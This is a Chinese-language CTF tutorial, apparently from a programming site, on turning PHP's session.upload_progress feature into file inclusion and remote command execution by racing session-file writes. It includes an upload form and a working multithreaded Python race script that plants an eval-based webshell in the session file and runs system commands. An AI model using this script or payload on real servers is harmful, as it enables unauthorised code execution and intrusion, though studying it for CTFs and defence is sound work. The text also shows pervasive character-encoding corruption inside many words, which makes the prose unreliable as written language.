使用session upload_progress實(shí)現(xiàn)文件包含實(shí)例詳解
前言
該思路是很久之前在CTF比賽中學(xué)習(xí)到的,可以簡(jiǎn)單理解為利用session.upload_progress來進(jìn)行文件競(jìng)爭(zhēng)從而達(dá)到上傳文件進(jìn)行文件包含或者命令執(zhí)行的目的,可能大部分人會(huì)不理解,我們下面我們展開來講。
基礎(chǔ)知識(shí)
session.upload_progress
首先我們要先學(xué)習(xí)什么是session.upload_progress,可以簡(jiǎn)單理解為文件上傳進(jìn)度,在php官方文檔里可以找到描述:

在這里面有幾個(gè)很重要的函數(shù),我們簡(jiǎn)單看一下:
session.upload_progress.enabled = on session.upload_progress.cleanup = on session.upload_progress.prefix = "upload_progress_" session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
第一個(gè)顯而易見是設(shè)定是否開啟該功能,第二個(gè)cleanup則是是否在上傳后刪除文件,第三個(gè)為設(shè)置前綴,第四個(gè)為session中的鍵值,那么他們有什么用呢?我們就可以在phpinfo里查看這些信息是否開啟以此來判斷能不能利用該漏洞。
攻擊方法
我們攻擊思路就是利用session.upload_progress來將木馬寫入到session里面,但這里有兩個(gè)問題:
問題一:代碼里沒有session_start,我們?nèi)绾蝿?chuàng)建session文件呢?
首先我們先看看session里面有一個(gè)很重要的選項(xiàng):
session.use_strict_mode //默認(rèn)值為off。
我們可以自己定義sessionid,假如我們定義sessionid為xino,則PHP將會(huì)在服務(wù)器上創(chuàng)建一個(gè)文件:/tmp/sess_xino”。即使我們沒有初始化Session,PHP也會(huì)自動(dòng)初始化Session。 并產(chǎn)生一個(gè)鍵值,這個(gè)鍵值由:
ini.get("session.upload_progress.prefix")+由我們構(gòu)造的session.upload_progress.name值組成
最后被寫入sess_文件里。
問題二:上面的cleanup設(shè)置會(huì)刪除數(shù)據(jù),我們要如何防止數(shù)據(jù)被刪除呢?
所以這里需要我們文件競(jìng)爭(zhēng)不斷發(fā)包直至上傳成功,之后再讀取session文件所在路徑即可。類似于下圖,可以搭配burpsuite使用:

之后我們即可進(jìn)行文件包含或者RCE攻擊,總結(jié)一下該漏洞的利用條件:
存在文件包含漏洞
知道session文件存放路徑,可以嘗試默認(rèn)路徑
具有讀取和寫入session文件的權(quán)限
下面給大家?guī)硪粋€(gè)例題。
例題
進(jìn)入題目首先看看題目源碼:

限制了我們很多東西,只能使用沒有后綴的文件進(jìn)行文件包含所以想到通過session.upload_progress來進(jìn)行文件包含,因?yàn)槲覀冃枰蟼饕粋€(gè)東西,所以我們先寫一個(gè)簡(jiǎn)單的文件上傳點(diǎn):
<!DOCTYPE html>
<html>
<body>
<form action="http://ctf" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
之后我們進(jìn)行發(fā)包抓包然后重放,查看回顯成功后我們?cè)L問/tmp/sess_flag,發(fā)現(xiàn)命令執(zhí)行了:

我們將之前發(fā)包文件里面的ls命令改為cat flag的文件名即可進(jìn)行命令執(zhí)行,也是抓包重放查看返回長(zhǎng)度不一樣的包:

如果不喜歡手動(dòng)我這里從網(wǎng)上找了一個(gè)自動(dòng)化腳本,大家也可以嘗試一下:
import io
import requests
import threading
sessid = 'FLAG'
data = {"cmd":"system('ls');"}
def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post( 'http://127.0.0.1/session.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('1.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
while True:
resp = session.post('http://127.0.0.1/session.php?file=/Applications/phpstudy/Extensions/tmp/tmp/sess_'+sessid,data=data)
if '1.txt' in resp.text:
print(resp.text)
event.clear()
else:
print("[+++++++++++++]retry")
if __name__=="__main__":
event=threading.Event()
with requests.session() as session:
for i in range(1,30):
threading.Thread(target=write,args=(session,)).start()
for i in range(1,30):
threading.Thread(target=read,args=(session,)).start()
event.set()
結(jié)語(yǔ)
今天給大家?guī)淼氖莝ession.upload_progress文件包含漏洞,因?yàn)樾枰恍┚W(wǎng)絡(luò)安全基礎(chǔ)可能部分讀者不太明白,這里有興趣的小伙伴可以自己去了解一下找個(gè)現(xiàn)成的靶機(jī)去嘗試一下,更多關(guān)于session upload_progress文件包含的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
PHP設(shè)計(jì)模式(五)適配器模式Adapter實(shí)例詳解【結(jié)構(gòu)型】
這篇文章主要介紹了PHP設(shè)計(jì)模式:適配器模式Adapter,結(jié)合實(shí)例形式詳細(xì)分析了PHP適配器模式Adapter基本概念、功能、原理、用法及操作注意事項(xiàng),需要的朋友可以參考下2020-05-05
在VS?Code?中調(diào)試遠(yuǎn)程服務(wù)器的PHP代碼詳解
這篇文章主要介紹了在VSCode中調(diào)試遠(yuǎn)程服務(wù)器的PHP代碼,這里通過xdebug配合vscode的php?debug插件來實(shí)現(xiàn),本文結(jié)合實(shí)例代碼介紹的非常詳細(xì),需要的朋友可以參考下2023-07-07
PHP 閉包獲取外部變量和global關(guān)鍵字聲明變量的區(qū)別講解
閉包是一個(gè)常見的概念,我們通??梢詫⑵渑c回調(diào)函數(shù)配合使用,可以使代碼更加簡(jiǎn)潔易讀。這篇文章主要介紹了PHP 閉包獲取外部變量和global關(guān)鍵字聲明變量的區(qū)別,需要的朋友可以參考下2017-12-12
php學(xué)習(xí)Eloquent修改器源碼示例解析
這篇文章主要為大家介紹了php學(xué)習(xí)Eloquent修改器源碼示例解析,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2023-06-06
php+ffmpeg如何獲取視頻縮略圖、視頻分辨率等相關(guān)信息
這篇文章主要給大家介紹了關(guān)于php+ffmpeg如何獲取視頻縮略圖、視頻分辨率等相關(guān)信息的相關(guān)資料,文中通過實(shí)例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下2022-03-03
Laravel中日期時(shí)間處理包Carbon的簡(jiǎn)單使用
處理日期和時(shí)間需要考慮很多事情,例如日期的格式、時(shí)區(qū)、閏年和天數(shù)各異的月份,自己處理太容易出錯(cuò)了,下面這篇文章主要給大家介紹了關(guān)于在Laravel中日期時(shí)間處理包Carbon的簡(jiǎn)單使用,需要的朋友可以參考下。2017-09-09

